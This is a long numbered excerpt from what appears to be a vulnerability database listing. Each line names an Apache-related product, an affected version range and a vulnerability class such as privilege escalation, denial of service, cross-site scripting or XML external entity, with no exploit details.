9263| [116928] Apache Fineract REST Endpoint Parameter privilege escalation
9264| [116927] Apache Fineract MakercheckersApiResource Parameter sql injection
9265| [116926] Apache Fineract REST Parameter privilege escalation
9266| [116574] Apache wicket-jquery-ui up to 6.29.0/7.10.1/8.0.0-M9.1 WYSIWYG Editor privilege escalation
9267| [116622] Oracle Enterprise Manager for MySQL Database 12.1.0.4 EM Plugin: General (Apache Tomcat) unknown vulnerability
9268| [115931] Apache Solr up to 6.6.2/7.2.1 XML Data Parameter XML External Entity
9269| [115883] Apache Hive up to 2.3.2 privilege escalation
9270| [115882] Apache Hive up to 2.3.2 xpath_short information disclosure
9271| [115881] Apache DriverHive JDBC Driver up to 2.3.2 Escape Argument Bypass privilege escalation
9272| [115518] Apache Ignite 2.3 Deserialization privilege escalation
9273| [115260] EMC RSA Authentication Agent for Web up to 8.0.1 on IIS/Apache cross site scripting
9274| [115259] EMC RSA Authentication Agent for Web up to 8.0.1 on IIS/Apache Cookie Stack-based memory corruption
9275| [115500] CA Workload Control Center up to r11.4 SP5 Apache MyFaces Component Code Execution
9276| [115121] Apache Struts REST Plugin up to 2.5.15 Xstream XML Data denial of service
9277| [115061] Apache HTTP Server up to 2.4.29 HTTP Digest Authentication Challenge HTTP Requests Replay privilege escalation
9278| [115060] Apache HTTP Server up to 2.4.29 mod_cache_socache Request Header Crash denial of service
9279| [115059] Apache HTTP Server up to 2.4.29 HTTP2 NULL Pointer Dereference denial of service
9280| [115058] Apache HTTP Server up to 2.4.29 HTTP Header Crash denial of service
9281| [115057] Apache HTTP Server up to 2.4.29 mod_session Variable Name Cache privilege escalation
9282| [115039] Apache HTTP Server up to 2.4.29 FilesMatch File Upload privilege escalation
9283| [115038] Apache HTTP Server up to 2.0.65/2.2.34/2.4.29 mod_authnz_ldap Crash denial of service
9284| [114817] Apache Syncope up to 1.2.10/2.0.7 Search Parameter information disclosure
9285| [114816] Apache Syncope up to 1.2.10/2.0.7 XSLT Code Execution
9286| [114717] Apache Commons 1.11/1.12/1.13/1.14/1.15 ZIP Archive ZipFile/ZipArchiveInputStream denial of service
9287| [114661] Apache Allura up to 1.8.0 HTTP Response Splitting privilege escalation
9288| [114400] Apache Tomcat JK ISAPI Connector up to 1.2.42 IIS/ISAPI privilege escalation
9289| [114258] Apache HTTP Server up to 2.4.22 mod_cluster Segmentation Fault denial of service
9290| [114086] Apache ODE 1.3.3 ODE Process Deployment Web Service directory traversal
9291| [113955] Apache Xerces-C up to 3.2.0 XML Parser NULL Pointer Dereference denial of service
9292| [113945] Apache Tomcat up to 7.0.84/8.0.49/8.5.27/9.0.4 URL Pattern Empty String privilege escalation
9293| [113944] Apache OpenMeetings up to 3.x/4.0.1 CRUD Operation denial of service
9294| [113905] Apache Traffic Server up to 5.2.x/5.3.2/6.2.0/7.0.0 TLS Handshake Core Dump denial of service
9295| [113904] Apache Traffic Server up to 6.2.0 Host Header privilege escalation
9296| [113895] Apache Geode up to 1.3.x Code Execution
9297| [113894] Apache Geode up to 1.3.x TcpServer Code Execution
9298| [113888] Apache James Hupa WebMail 0.0.2 cross site scripting
9299| [113813] Apache Geode Cluster up to 1.3.x Secure Mode privilege escalation
9300| [113747] Apache Tomcat Servlets privilege escalation
9301| [113647] Apache Qpid up to 0.30 qpidd Broker AMQP Message Crash denial of service
9302| [113645] Apache VCL up to 2.1/2.2.1/2.3.1 Web GUI/XMLRPC API privilege escalation
9303| [113560] Apache jUDDI Console 3.0.0 Log Entries spoofing
9304| [113571] Apache Oozie up to 4.3.0/5.0.0-beta1 XML Data XML File privilege escalation
9305| [113569] Apache Karaf up to 4.0.7 LDAPLoginModule LDAP injection denial of service
9306| [113273] Apache JMeter 2.x/3.x Distributed Test Only privilege escalation
9307| [113198] Apache Qpid Dispatch Router 0.7.0/0.8.0 AMQP denial of service
9308| [113186] Apache JMeter 2.x/3.x Distributed Test Only privilege escalation
9309| [113145] Apache Thrift up to 0.9.3 Go Client Library privilege escalation
9310| [113106] Apache jUDDI up to 3.3.3 XML Data WADL2Java/WSDL2Java XML Document privilege escalation
9311| [113105] Apache Qpid Broker-J 7.0.0 AMQP Crash denial of service
9312| [112885] Apache Allura up to 1.8.0 File information disclosure
9313| [112856] Apache CloudStack up to 4.8.1.0/4.9.0.0 API weak authentication
9314| [112855] Apache CloudStack 4.1.0/4.1.1 API information disclosure
9315| [112678] Apache Tomcat up to 7.0.82/8.0.47/8.5.23/9.0.1 Bug Fix 61201 privilege escalation
9316| [112677] Apache Tomcat Native Connector up to 1.1.34/1.2.14 OCSP Checker Client weak authentication
9317| [112625] Apache POI up to 3.16 Loop denial of service
9318| [112448] Apache NiFi up to 1.3.x Deserialization privilege escalation
9319| [112396] Apache Hadoop 2.7.3/2.7.4 YARN NodeManager Credentials information disclosure
9320| [112339] Apache NiFi 1.5.0 Header privilege escalation
9321| [112330] Apache NiFi 1.5.0 Header HTTP Request privilege escalation
9322| [112314] NetGain Enterprise Manager 7.2.730 Build 1034 org.apache.jsp.u.jsp.tools.exec_jsp Servlet Parameter privilege escalation
9323| [112253] Apache Hadoop up to 0.23.x/2.7.4/2.8.2 MapReduce Job History Server Configuration File privilege escalation
9324| [112171] Oracle Secure Global Desktop 5.3 Apache Log4j privilege escalation
9325| [112164] Oracle Agile PLM 9.3.5/9.3.6 Apache Tomcat unknown vulnerability
9326| [112161] Oracle Agile PLM 9.3.3/9.3.4/9.3.5/9.3.6 Apache Tomcat privilege escalation
9327| [112158] Oracle Autovue for Agile Product Lifecycle Management 21.0.0/21.0.1 Apache Log4j privilege escalation
9328| [112156] Oracle Agile PLM 9.3.3/9.3.4/9.3.5/9.3.6 Apache Log4j privilege escalation
9329| [112155] Oracle Agile Engineering Data Management 6.1.3/6.2.0/6.2.1 Apache Log4j privilege escalation
9330| [112137] Oracle MICROS Relate CRM Software 10.8.x/11.4.x/15.0.x, Apache Tomcat unknown vulnerability
9331| [112136] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Tomcat privilege escalation
9332| [112133] Oracle Retail Workforce Management 1.60.7/1.64.0 Apache Log4j privilege escalation
9333| [112129] Oracle Retail Assortment Planning 14.1.3/15.0.3/16.0.1 Apache Log4j privilege escalation
9334| [112114] Oracle 9.1 Apache Log4j privilege escalation
9335| [112113] Oracle 9.1 Apache Log4j privilege escalation
9336| [112045] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat privilege escalation
9337| [112038] Oracle Health Sciences Empirica Inspections 1.0.1.1 Apache Tomcat information disclosure
9338| [112019] Oracle Endeca Information Discovery Integrator 3.1.0/3.2.0 Apache Tomcat privilege escalation
9339| [112017] Oracle WebCenter Portal 11.1.1.9.0/12.2.1.2.0/12.2.1.3.0 Apache Struts 1 cross site scripting
9340| [112011] Oracle Identity Manager 11.1.2.3.0 Apache Commons Collections privilege escalation
9341| [111950] Oracle Database 12.2.0.1 Apache Tomcat information disclosure
9342| [111703] Apache Sling XSS Protection API 1.0.4 URL Encoding cross site scripting
9343| [111556] Apache Geode up to 1.2.x Secure Mode Parameter OQL privilege escalation
9344| [111555] Apache Geode up to 1.2.x Secure Mode OQL privilege escalation
9345| [111540] Apache Geode up to 1.2.x Secure Mode information disclosure
9346| [111519] Apache Sling JCR ContentLoader 2.1.4 xmlreader directory traversal
9347| [111338] Apache DeltaSpike-JSF 1.8.0 cross site scripting
9348| [111330] Apache OFBiz 16.11.01/16.11.02/16.11.03 BIRT Plugin cross site scripting
9349| [110789] Apache Sling up to 1.4.0 Authentication Service Credentials information disclosure
9350| [110785] Apache Drill up to 1.11.0 Query Page unknown vulnerability
9351| [110701] Apache Fineract Query Parameter sql injection
9352| [110484] Apache Synapse up to 3.0.0 Apache Commons Collections Serialized Object Code Injection privilege escalation
9353| [110426] Adobe Experience Manager 6.0/6.1/6.2/6.3 Apache Sling Servlets Post cross site scripting
9354| [110141] Apache Struts up to 2.5.14 REST Plugin denial of service
9355| [110140] Apache Qpid Broker-J up to 0.32 privilege escalation
9356| [110139] Apache Qpid Broker-J up to 6.1.4 AMQP Frame denial of service
9357| [110106] Apache CXF Fediz Spring cross site request forgery
9358| [109766] Apache OpenOffice up to 4.1.3 DOC File Parser WW8Fonts memory corruption
9359| [109750] Apache OpenOffice up to 4.1.3 DOC File Parser ImportOldFormatStyles memory corruption
9360| [109749] Apache OpenOffice up to 4.1.3 PPT File Parser PPTStyleSheet memory corruption
9361| [109606] October CMS Build 412 Apache Configuration File Upload privilege escalation
9362| [109419] Apache Camel up to 2.19.3/2.20.0 camel-castor Java Object Deserialization privilege escalation
9363| [109418] Apache Camel up to 2.19.3/2.20.0 camel-hessian Java Object Deserialization privilege escalation
9364| [109400] Apache CouchDB up to 1.6.x/2.1.0 Database Server Shell privilege escalation
9365| [109399] Apache CouchDB up to 1.6.x/2.1.0 JSON Parser Shell privilege escalation
9366| [109398] Apache CXF 3.1.14/3.2.1 JAX-WS/JAX-RS Attachment denial of service
9367| [108872] Apache Hive up to 2.1.1/2.2.0/2.3.0 Policy Enforcement privilege escalation
9368| [108939] Apple macOS up to 10.13.1 apache unknown vulnerability
9369| [108938] Apple macOS up to 10.13.1 apache denial of service
9370| [108937] Apple macOS up to 10.13.1 apache unknown vulnerability
9371| [108936] Apple macOS up to 10.13.1 apache unknown vulnerability
9372| [108935] Apple macOS up to 10.13.1 apache denial of service
9373| [108934] Apple macOS up to 10.13.1 apache unknown vulnerability
9374| [108933] Apple macOS up to 10.13.1 apache unknown vulnerability
9375| [108932] Apple macOS up to 10.13.1 apache unknown vulnerability
9376| [108931] Apple macOS up to 10.13.1 apache denial of service
9377| [108930] Apple macOS up to 10.13.1 apache unknown vulnerability
9378| [108929] Apple macOS up to 10.13.1 apache denial of service
9379| [108928] Apple macOS up to 10.13.1 apache unknown vulnerability
9380| [108797] Apache Struts up to 2.3.19 TextParseUtiltranslateVariables OGNL Expression privilege escalation
9381| [108795] Apache Traffic Server up to 5.3.0 HTTP2 set_dynamic_table_size memory corruption
9382| [108794] Apache WSS4J up to 1.6.16/2.0.1 Incomplete Fix Leak information disclosure
9383| [108793] Apache Qpid up to 0.30 qpidd Crash denial of service
9384| [108792] Apache Traffic Server up to 5.1.0 Access Restriction privilege escalation
9385| [108791] Apache Wicket up to 1.5.11/6.16.x/7.0.0-M2 Session information disclosure
9386| [108790] Apache Storm 0.9.0.1 Log Viewer directory traversal
9387| [108789] Apache Cordova In-App-Browser Standalone Plugin up to 0.3.1 on iOS CDVInAppBrowser privilege escalation
9388| [108788] Apache Cordova File-Transfer Standalone Plugin up to 0.4.1 on iOS ios/CDVFileTransfer.m spoofing
9389| [108787] Apache HttpClient up to 4.3.0 HttpClientBuilder.java unknown vulnerability
9390| [108786] Apache Wicket up to 1.4.21/1.5.9/6.3.x script Tag cross site scripting
9391| [108783] Apache Hadoop up to 0.23.3/1.0.3/2.0.1 Kerberos Security Feature Key weak encryption
9392| [108782] Apache Xerces2 XML Service denial of service
9393| [108781] Apache jUDDI up to 1.x happyjuddi.jsp Parameter cross site scripting
9394| [108780] Apache jUDDI up to 1.x Log File uddiget.jsp spoofing
9395| [108709] Apache Cordova Android up to 3.7.1/4.0.1 intent URL privilege escalation
9396| [108708] Apache ActiveMQ up to 5.10.0 XML Data XML External Entity
9397| [108707] Apache ActiveMQ up to 1.7.0 XML Data XML External Entity
9398| [108629] Apache OFBiz up to 10.04.01 privilege escalation
9399| [108543] Apache Derby 10.1.2.1/10.2.2.0/10.3.1.4/10.4.1.3 Export File privilege escalation
9400| [108312] Apache HTTP Server on RHEL IP Address Filter privilege escalation
9401| [108297] Apache NiFi up to 0.7.1/1.1.1 Proxy Chain Username Deserialization privilege escalation
9402| [108296] Apache NiFi up to 0.7.1/1.1.1 Cluster Request privilege escalation
9403| [108250] Oracle Secure Global Desktop 5.3 Apache HTTP Server memory corruption
9404| [108245] Oracle Transportation Management up to 6.3.7 Apache Tomcat unknown vulnerability
9405| [108244] Oracle Transportation Management 6.4.1/6.4.2 Apache Commons FileUpload denial of service
9406| [108243] Oracle Agile Engineering Data Management 6.1.3/6.2.0 Apache Commons Collections memory corruption
9407| [108222] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Batik denial of service
9408| [108219] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Tomcat unknown vulnerability
9409| [108217] Oracle Retail Store Inventory Management 13.2.9/14.0.4/14.1.3/15.0.1/16.0.1 Apache Groovy unknown vulnerability
9410| [108216] Oracle Retail Convenience and Fuel POS Software 2.1.132 Apache Groovy unknown vulnerability
9411| [108169] Oracle MySQL Enterprise Monitor up to 3.2.8.2223/3.3.4.3247/3.4.2.4181 Apache Tomcat unknown vulnerability
9412| [108113] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Batik denial of service
9413| [108107] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat unknown vulnerability
9414| [108102] Oracle Healthcare Master Person Index 4.x Apache Groovy unknown vulnerability
9415| [108085] Oracle Identity Manager 11.1.2.3.0 Apache Struts 1 memory corruption
9416| [108083] Oracle API Gateway 11.1.2.4.0 Apache Batik denial of service
9417| [108080] Oracle GlassFish Server 3.1.2 Apache Commons FileUpload denial of service
9418| [108066] Oracle Management Pack for GoldenGate 11.2.1.0.12 Apache Tomcat memory corruption
9419| [108062] Oracle BI Publisher 11.1.1.7.0/12.2.1.1.0/12.2.1.2.0 Apache ActiveMQ memory corruption
9420| [108060] Oracle Enterprise Manager Ops Center 12.2.2/12.3.2 Apache Groovy unknown vulnerability
9421| [108033] Oracle Primavera Unifier 9.13/9.14/10.x/15.x/16.x, Apache Groovy unknown vulnerability
9422| [108013] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 Apache Groovy unknown vulnerability
9423| [108011] Oracle Communications Services Gatekeeper 5.1/6.0 Apache Trinidad unknown vulnerability
9424| [107904] Apache Struts up to 2.3.28 Double OGNL Evaluation privilege escalation
9425| [107860] Apache Solr up to 7.0 Apache Lucene RunExecutableListener XML External Entity
9426| [107834] Apache Ranger up to 0.6.1 Change Password privilege escalation
9427| [107639] Apache NiFi 1.4.0 XML External Entity
9428| [107606] Apache ZooKeper up to 3.4.9/3.5.2 Command CPU Exhaustion denial of service
9429| [107597] Apache Roller up to 5.0.2 XML-RPC Protocol Support XML External Entity
9430| [107429] Apache Impala up to 2.9.x Kudu Table privilege escalation
9431| [107411] Apache Tomcat up to 7.0.81/8.0.46/8.5.22/9.0.0 JSP File File Upload privilege escalation
9432| [107385] Apache Geode up to 1.2.0 Secure Mode privilege escalation
9433| [107339] Apache OpenNLP up to 1.5.3/1.6.0/1.7.2/1.8.1 XML Data XML External Entity
9434| [107333] Apache Wicket up to 8.0.0-M1 CSRF Prevention HTTP Header privilege escalation
9435| [107323] Apache Wicket 1.5.10/6.13.0 Class Request information disclosure
9436| [107310] Apache Geode up to 1.2.0 Command Line Utility Query privilege escalation
9437| [107276] ArcSight ESM/ArcSight ESM Express up to 6.9.1c Patch 3/6.11.0 Apache Tomcat Version information disclosure
9438| [107266] Apache Tika up to 1.12 XML Parser XML External Entity
9439| [107262] Apache Mesos up to 1.1.2/1.2.1/1.3.0/1.4.0-dev libprocess HTTP Request Crash denial of service
9440| [107258] Apache Mesos up to 1.1.2/1.2.1/1.3.0/1.4.0-dev libprocess HTTP Request Crash denial of service
9441| [107197] Apache Xerces Jelly Parser XML File XML External Entity
9442| [107193] ZTE NR8950 Apache Commons Collections RMI Request Deserialization privilege escalation
9443| [107084] Apache Struts up to 2.3.19 cross site scripting
9444| [106877] Apache Struts up to 2.0.33/2.5.10 Freemarker Tag privilege escalation
9445| [106875] Apache Struts up to 2.5.5 URL Validator denial of service
9446| [106874] Apache Struts up to 2.3.30 Convention Plugin directory traversal
9447| [106847] Apache Tomcat up to 7.0.80 VirtualDirContext Source information disclosure
9448| [106846] Apache Tomcat up to 7.0.79 on Windows HTTP PUT Method Parameter File Upload privilege escalation
9449| [106777] Apache HTTP Server up to 2.2.34/2.4.27 Limit Directive ap_limit_section HTTP Request information disclosure
9450| [106739] puppetlabs-apache up to 1.11.0/2.0.x weak authentication
9451| [106720] Apache Wicket up to 1.5.12/6.18.x/7.0.0-M4 CryptoMapper privilege escalation
9452| [106586] Apache Brooklyn up to 0.9.x REST Server cross site scripting
9453| [106562] Apache Spark up to 2.1.1 Launcher API Deserialization privilege escalation
9454| [106559] Apache Brooklyn up to 0.9.x SnakeYAML YAML Data Java privilege escalation
9455| [106558] Apache Brooklyn up to 0.9.x REST Server cross site request forgery
9456| [106556] Apache Traffic Server up to 5.3.1 HTTP2 unknown vulnerability
9457| [106555] Apache Traffic Server up to 5.3.1 HTTP2 unknown vulnerability
9458| [106171] Apache Directory LDAP API up to 1.0.0-M30 Timing unknown vulnerability
9459| [106167] Apache Struts up to 2.5.12 REST Plugin XML Data privilege escalation
9460| [106166] Apache Struts up to 2.3.33/2.5.12 REST Plugin denial of service
9461| [106165] Apache Struts up to 2.3.33/2.5.12 URLValidator Regex CPU Exhaustion denial of service
9462| [106115] Apache Hadoop up to 2.6.4/2.7.2 YARN NodeManager Password information disclosure
9463| [106012] Apache Solr up to 5.5.3/6.4.0 Replication directory traversal
9464| [105980] Apache Engine 16.11.01 Parameter Reflected unknown vulnerability
9465| [105962] Apache Atlas 0.6.0/0.7.0 Frame cross site scripting
9466| [105961] Apache Atlas 0.6.0/0.7.0 Stack Trace information disclosure
9467| [105960] Apache Atlas 0.6.0/0.7.0 Search Reflected cross site scripting
9468| [105959] Apache Atlas 0.6.0/0.7.0 edit Tag DOM cross site scripting
9469| [105958] Apache Atlas 0.6.0/0.7.0 edit Tag Stored cross site scripting
9470| [105957] Apache Atlas 0.6.0/0.7.0 Cookie privilege escalation
9471| [105905] Apache Atlas 0.6.0/0.7.0/0.7.1 /js privilege escalation
9472| [105878] Apache Struts up to 2.3.24.0 privilege escalation
9473| [105682] Apache2Triad 1.5.4 phpsftpd/users.php Parameter cross site scripting
9474| [105681] Apache2Triad 1.5.4 phpsftpd/users.php Request cross site request forgery
9475| [105680] Apache2Triad 1.5.4 Parameter Session Fixation weak authentication
9476| [105643] Apache Pony Mail up to 0.8b weak authentication
9477| [105288] Apache Sling up to 2.3.21 Sling.evalString() String cross site scripting
9478| [105219] Apache Tomcat up to 8.5.15/9.0.0.M21 HTTP2 Bypass directory traversal
9479| [105218] Apache Tomcat up to 7.0.78/8.0.44/8.5.15/9.0.0.M21 CORS Filter Cache Poisoning privilege escalation
9480| [105215] Apache CXF up to 3.0.12/3.1.9 OAuth2 Hawk/JOSE MAC Validation Timing unknown vulnerability
9481| [105206] Apache CXF up to 3.0.11/3.1.8 JAX-RS Module XML External Entity
9482| [105205] Apache CXF up to 3.0.11/3.1.8 HTTP Transport Module Parameter cross site scripting
9483| [105202] Apache Storm 1.0.0/1.0.1/1.0.2/1.0.3/1.1.0 Worker privilege escalation
9484| [104987] Apache Xerces-C++ XML Service CPU Exhaustion denial of service
9485| [104986] Apache CXF 2.4.5/2.5.1 WS-SP UsernameToken Policy SOAP Request weak authentication
9486| [104985] Apache MyFaces Core up to 2.1.4 EL Expression Parameter Injection information disclosure
9487| [104983] Apache Wink up to 1.1.1 XML Document xxe privilege escalation
9488| [104981] Apache Commons Email 1.0/1.1/1.2/1.3/1.4 Subject Linebreak SMTP privilege escalation
9489| [104591] MEDHOST Document Management System Apache Solr Default Credentials weak authentication
9490| [104062] Oracle MySQL Enterprise Monitor up to 3.3.3.1199 Apache Tomcat unknown vulnerability
9491| [104061] Oracle MySQL Enterprise Monitor up to 3.2.7.1204/3.3.3.1199 Apache Tomcat unknown vulnerability
9492| [104060] Oracle MySQL Enterprise Monitor up to 3.1.5.7958/3.2.5.1141/3.3.2.1162 Apache Struts 2 unknown vulnerability
9493| [103995] Oracle 8.3/8.4/15.1/15.2 Apache Trinidad unknown vulnerability
9494| [103993] Oracle Policy Automation up to 12.2.3 Apache Commons FileUplaod denial of service
9495| [103916] Oracle Banking Platform 2.3/2.4/2.4.1/2.5 Apache Commons FileUpload denial of service
9496| [103906] Oracle Communications BRM 11.2.0.0.0 Apache Commons Collections privilege escalation
9497| [103904] Oracle Communications BRM 11.2.0.0.0/11.3.0.0.0 Apache Groovy memory corruption
9498| [103866] Oracle Transportation Management 6.1/6.2 Apache Webserver unknown vulnerability
9499| [103816] Oracle BI Publisher 11.1.1.9.0/12.2.1.1.0/12.2.1.2.0 Apache Commons Fileupload denial of service
9500| [103797] Oracle Tuxedo System and Applications Monitor Apache Commons Collections privilege escalation
9501| [103792] Oracle Enterprise Data Quality 8.1.13.0.0 Apache Commons Fileupload privilege escalation
9502| [103791] Oracle Endeca Server 7.6.0.0/7.6.1.0 Apache Commons Collections privilege escalation
9503| [103788] Oracle Enterprise Repository 11.1.1.7.0/12.1.3.0.0 Apache ActiveMQ memory corruption
9504| [103787] Oracle Enterprise Data Quality 8.1.13.0.0 Apache Groovy memory corruption
9505| [103763] Apache Sling up to 1.0.11 XSS Protection API XSS.getValidXML() Application XML External Entity
9506| [103762] Apache Sling up to 1.0.12 XSS Protection API XSSAPI.encodeForJSString() Script Tag cross site scripting
9507| [103693] Apache OpenMeetings 1.0.0 HTTP Method privilege escalation
9508| [103692] Apache OpenMeetings 1.0.0 Tomcat Error information disclosure
9509| [103691] Apache OpenMeetings 3.2.0 Parameter privilege escalation
9510| [103690] Apache OpenMeetings 1.0.0 sql injection
9511| [103689] Apache OpenMeetings 1.0.0 crossdomain.xml privilege escalation
9512| [103688] Apache OpenMeetings 1.0.0 weak encryption
9513| [103687] Apache OpenMeetings 1.0.0 cross site request forgery
9514| [103556] Apache Roller 5.1.0/5.1.1 Weblog Page Template VTL privilege escalation
9515| [103554] Apache OpenMeetings 1.0.0 Password Update unknown vulnerability
9516| [103553] Apache OpenMeetings 1.0.0 File Upload privilege escalation
9517| [103552] Apache OpenMeetings 3.2.0 Chat cross site scripting
9518| [103551] Apache OpenMeetings 3.1.0 XML unknown vulnerability
9519| [103521] Apache HTTP Server 2.4.26 HTTP2 Free memory corruption
9520| [103520] Apache HTTP Server up to 2.2.33/2.4.26 mod_auth_digest Authorization Header memory corruption
9521| [103519] Apache Struts up to 2.5.11/2.3.32 Spring AOP denial of service
9522| [103518] Apache Struts up to 2.5.11 URLValidator directory traversal
9523| [103492] Apache Spark up to 2.1.x Web UI Reflected cross site scripting
9524| [103401] Apache Struts 2.3.x Struts 1 Plugin ActionMessage privilege escalation
9525| [103399] Apache Traffic Control Traffic Router TCP Connection Slowloris denial of service
9526| [103387] Apache Impala up to 2.8.0 StatestoreSubscriber weak encryption
9527| [103386] Apache Impala up to 2.7.x/2.8.0 Kerberos weak authentication
9528| [103352] Apache Solr Node weak authentication
9529| [102897] Apache Ignite up to 2.0 Update Notifier information disclosure
9530| [102878] Code42 CrashPlan 5.4.x RMI Server org.apache.commons.ssl.rmi.DateRMI privilege escalation
9531| [102698] Apache HTTP Server up to 2.2.32/2.4.25 mod_mime Content-Type memory corruption
9532| [102697] Apache HTTP Server 2.2.24/2.2.32 HTTP Strict Parsing ap_find_token Request Header memory corruption
9533| [102690] Apache HTTP Server up to 2.2.32/2.4.25 mod_ssl ap_hook_process_connection() denial of service
9534| [102689] Apache HTTP Server up to 2.2.32/2.4.25 ap_get_basic_auth_pw weak authentication
9535| [102622] Apache Thrift up to 0.9.2 Client Libraries skip denial of service
9536| [102538] Apache Ranger up to 0.7.0 Authorizer unknown vulnerability
9537| [102537] Apache Ranger up to 0.7.0 Wildcard Character unknown vulnerability
9538| [102536] Apache Ranger up to 0.6 Stored cross site scripting
9539| [102535] Apache Ranger up to 0.6.2 Policy Engine unknown vulnerability
9540| [102255] Apache NiFi up to 0.7.3/1.2.x Response Header privilege escalation
9541| [102254] Apache NiFi up to 0.7.3/1.2.x UI cross site scripting
9542| [102070] Apache CXF Fediz up to 1.1.2/1.2.0 Application Plugin denial of service
9543| [102020] Apache Tomcat up to 9.0.0.M1 Java Servlet HTTP Method unknown vulnerability
9544| [101858] Apache Hive up to 1.2.1/2.0.0 Client weak authentication
9545| [101802] Apache KNOX up to 0.11.0 WebHDFS privilege escalation
9546| [101928] HPE Aruba ClearPass Apache Tomcat information disclosure
9547| [101524] Apache Archiva up to 1.x/2.2.1 REST Endpoint cross site request forgery
9548| [101513] Apache jUDDI 3.1./3.1.2/3.1.3/3.1.4 Logout Open Redirect
9549| [101430] Apache CXF Fediz up to 1.3.1 OIDC Service cross site request forgery
9550| [101429] Apache CXF Fediz up to 1.2.3/1.3.1 Plugins cross site request forgery
9551| [100619] Apache Hadoop up to 2.6.x HDFS Servlet unknown vulnerability
9552| [100618] Apache Hadoop up to 2.7.0 HDFS Web UI cross site scripting
9553| [100621] Adobe ColdFusion 10/11/2016 Apache BlazeDS Library Deserialization privilege escalation
9554| [100205] Oracle MySQL Enterprise Monitor up to 3.1.6.8003/3.2.1182/3.3.2.1162 Apache Commons FileUpload denial of service
9555| [100191] Oracle Secure Global Desktop 4.71/5.2/5.3 Web Server (Apache HTTP Server) information disclosure
9556| [100162] Oracle StorageTek Tape Analytics SW Tool up to 2.2.0 Apache Commons Collections privilege escalation
9557| [100160] Oracle StorageTek Tape Analytics SW Tool up to 2.2.0 Apache Trinidad unknown vulnerability
9558| [99969] Oracle WebCenter Sites 11.1.1.8.0 Apache Tomcat memory corruption
9559| [99937] Apache Batik up to 1.8 privilege escalation
9560| [99936] Apache FOP up to 2.1 privilege escalation
9561| [99935] Apache CXF up to 3.0.12/3.1.10 STSClient Cache information disclosure
9562| [99934] Apache CXF up to 3.0.12/3.1.10 JAX-RS XML Security Streaming Client spoofing
9563| [99930] Apache Traffic Server up to 6.2.0 denial of service
9564| [99929] Apache Log4j up to 2.8.1 Socket Server Deserialization privilege escalation
9565| [99925] Apache Traffic Server 6.0.0/6.1.0/6.2.0 HPACK Bomb denial of service
9566| [99738] Ping Identity OpenID Connect Authentication Module up to 2.13 on Apache Mod_auth_openidc.c spoofing
9567| [117569] Apache Hadoop up to 2.7.3 privilege escalation
9568| [99591] Apache TomEE up to 1.7.3/7.0.0-M2 EjbObjectInputStream Serialized Object privilege escalation
9569| [99370] Apache Ignite up to 1.8 update-notifier Document XML External Entity
9570| [99299] Apache Geode up to 1.1.0 Pulse OQL Query privilege escalation
9571| [99572] Apache Tomcat up to 7.0.75/8.0.41/8.5.11/9.0.0.M17 Application Listener privilege escalation
9572| [99570] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 HTTP Connector Cache information disclosure
9573| [99569] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 HTTP/2 GOAWAY Frame Resource Exhaustion denial of service
9574| [99568] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 Pipelined Request information disclosure
9575| [99048] Apache Ambari up to 2.3.x REST API Shell Metacharacter privilege escalation
9576| [99014] Apache Camel Jackson/JacksonXML privilege escalation
9577| [98610] Apple macOS up to 10.12.3 apache_mod_php memory corruption
9578| [98609] Apple macOS up to 10.12.3 apache_mod_php denial of service
9579| [98608] Apple macOS up to 10.12.3 apache_mod_php memory corruption
9580| [98607] Apple macOS up to 10.12.3 apache_mod_php denial of service
9581| [98606] Apple macOS up to 10.12.3 apache_mod_php denial of service
9582| [98605] Apple macOS up to 10.12.3 Apache denial of service
9583| [98604] Apple macOS up to 10.12.3 Apache denial of service
9584| [98603] Apple macOS up to 10.12.3 Apache denial of service
9585| [98602] Apple macOS up to 10.12.3 Apache denial of service
9586| [98601] Apple macOS up to 10.12.3 Apache denial of service
9587| [98517] Apache POI up to 3.14 OOXML File XXE denial of service
9588| [98405] Apache Hadoop up to 0.23.10 privilege escalation
9589| [98199] Apache Camel Validation XML External Entity
9590| [97892] Apache Tomcat up to 9.0.0.M15 Reverse-Proxy Http11InputBuffer.java information disclosure
9591| [97617] Apache Camel camel-snakeyaml Deserialization privilege escalation
9592| [97602] Apache Camel camel-jackson/camel-jacksonxml CamelJacksonUnmarshalType privilege escalation
9593| [97732] Apache Struts up to 2.3.31/2.5.10 Jakarta Multipart Parser Content-Type privilege escalation
9594| [97466] mod_auth_openidc up to 2.1.5 on Apache weak authentication
9595| [97455] mod_auth_openidc up to 2.1.4 on Apache weak authentication
9596| [97081] Apache Tomcat HTTPS Request denial of service
9597| [97162] EMC OpenText Documentum D2 BeanShell/Apache Commons privilege escalation
9598| [96949] Hanwha Techwin Smart Security Manager up to 1.5 Redis/Apache Felix Gogo privilege escalation
9599| [96314] Apache Cordova up to 6.1.1 on Android weak authentication
9600| [95945] Apple macOS up to 10.12.2 apache_mod_php denial of service
9601| [95944] Apple macOS up to 10.12.2 apache_mod_php denial of service
9602| [95943] Apple macOS up to 10.12.2 apache_mod_php memory corruption
9603| [95666] Oracle FLEXCUBE Direct Banking 12.0.0/12.0.1/12.0.2/12.0.3 Apache Commons Collections privilege escalation
9604| [95455] Apache NiFi up to 1.0.0/1.1.0 Connection Details Dialogue cross site scripting
9605| [95311] Apache Storm UI Daemon privilege escalation
9606| [95291] ZoneMinder 1.30.0 Apache httpd privilege escalation
9607| [94800] Apache Wicket up to 1.5.16/6.24.x Deserialize DiskFileItem denial of service
9608| [94705] Apache Qpid Broker for Java up to 6.1.0 SCRAM-SHA-1/SCRAM-SHA-256 User information disclosure
9609| [94627] Apache HTTP Server up to 2.4.24 mod_auth_digest Crash denial of service
9610| [94626] Apache HTTP Server up to 2.4.24 mod_session_crypto Padding weak encryption
9611| [94625] Apache HTTP Server up to 2.4.24 Response Split privilege escalation
9612| [94540] Apache Tika 1.9 tika-server File information disclosure
9613| [94600] Apache ActiveMQ up to 5.14.1 Administration Console cross site scripting
